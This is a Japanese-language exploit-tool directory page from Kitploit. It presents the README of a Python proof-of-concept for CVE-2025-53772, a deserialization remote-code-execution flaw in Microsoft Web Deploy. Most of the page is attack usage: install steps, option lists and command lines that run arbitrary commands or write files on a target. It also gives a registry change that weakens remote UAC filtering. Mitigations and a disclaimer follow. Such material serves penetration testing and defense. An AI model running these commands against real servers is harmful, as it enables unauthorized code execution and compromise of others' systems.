Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-53772 — cve-2025-53772 の poc | Kitploit
ツール/GitHubGitHub/sailay1996/cve-2025-53772
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

cve-2025-53772 の poc

リポジトリを見る
46118ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-53772 - Microsoft Web Deploy RCE エクスプロイト

CVE-2025-53772用のPythonベースのエクスプロイト。Microsoft Web Deploy (msdeploy) のリモートコード実行脆弱性で、HTTPヘッダーデータの安全でない逆シリアル化によって引き起こされます。

🎬 POC ビデオ

POC


脆弱性の概要

プロパティ値
CVE IDCVE-2025-53772
CVSS スコア8.8 (高)
影響を受ける製品Microsoft Web Deploy 4.0
脆弱なバージョン< 10.0.2001
修正済みバージョン10.0.2001+
脆弱性の種類信頼されていないデータの逆シリアル化 (CWE-502)
認証必要 (低権限)

動作原理

この脆弱性は、MSDeploy.SyncOptions HTTPヘッダーの逆シリアル化に存在します。特別に細工されたペイロードが送信されると、サーバーは BinaryFormatter を使用してそれを逆シリアル化し、TypeConfuseDelegate ガジェットチェーンを介して任意のコード実行を引き起こします。

root@kitploit:~
攻撃者                                   ターゲットサーバー
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE 達成!

影響を受けるエンドポイント

エンドポイントポートプロトコル認証タイプ
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

インストール

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

要件

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

使用方法

クイックスタート

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

オプション

root@kitploit:~
-t, --target      ターゲットIPまたはホスト名 (必須)
-u, --user        ユーザー名 (必須)
-P, --password    パスワード (必須)
--port            ターゲットポート (デフォルト: 80)
--endpoint        エンドポイントパス (デフォルト: /MSDEPLOYAGENTSERVICE)
--ntlm            NTLM認証を使用 (Agent Serviceで必要)
--calc            calc.exeを実行
--proof-temp      C:\Windows\Temp\pwned.txtを作成
--proof-web       C:\inetpub\wwwroot\pwned.txtを作成
-c, --command     実行するカスタムコマンド
--generate-only   ペイロードのみ生成、送信しない
-o, --output      ペイロードをファイルに保存

例

Agent Service (ポート80 - NTLM認証)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc Service (ポート8172 - Basic認証)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

確認

エクスプロイト実行後、ターゲット上で実行を確認:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

一般的な問題

401 Unauthorized (NTLM)

Agent Service を NTLM で使用していて 401 が発生する場合:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Not Found (msdeploy.axd)

IIS ハンドラーが登録されていない可能性があります。代わりに Agent Service エンドポイントを使用してください:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

脆弱なバージョンの確認

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

緩和策

  1. Web Deploy をバージョン 10.0.2001 以降に更新する
  2. ファイアウォールを介して Web Deploy エンドポイントへのアクセスを制限する
  3. 強力な資格情報を使用し、パスワードの再利用を避ける
  4. ポート 80/8172 での不審なアクティビティのログを監視する
  5. 不要な場合は Web Deploy を無効にする

参考文献

  • Microsoft セキュリティアドバイザリ
  • NVD - CVE-2025-53772
  • HawkTrace によるオリジナル研究

免責事項

このツールは 許可されたセキュリティテストおよび教育目的のみ のために提供されています。コンピュータシステムへの不正アクセスは違法です。テストの前に必ず適切な許可を取得してください。


ライセンス

MIT ライセンス

ツールをダウンロード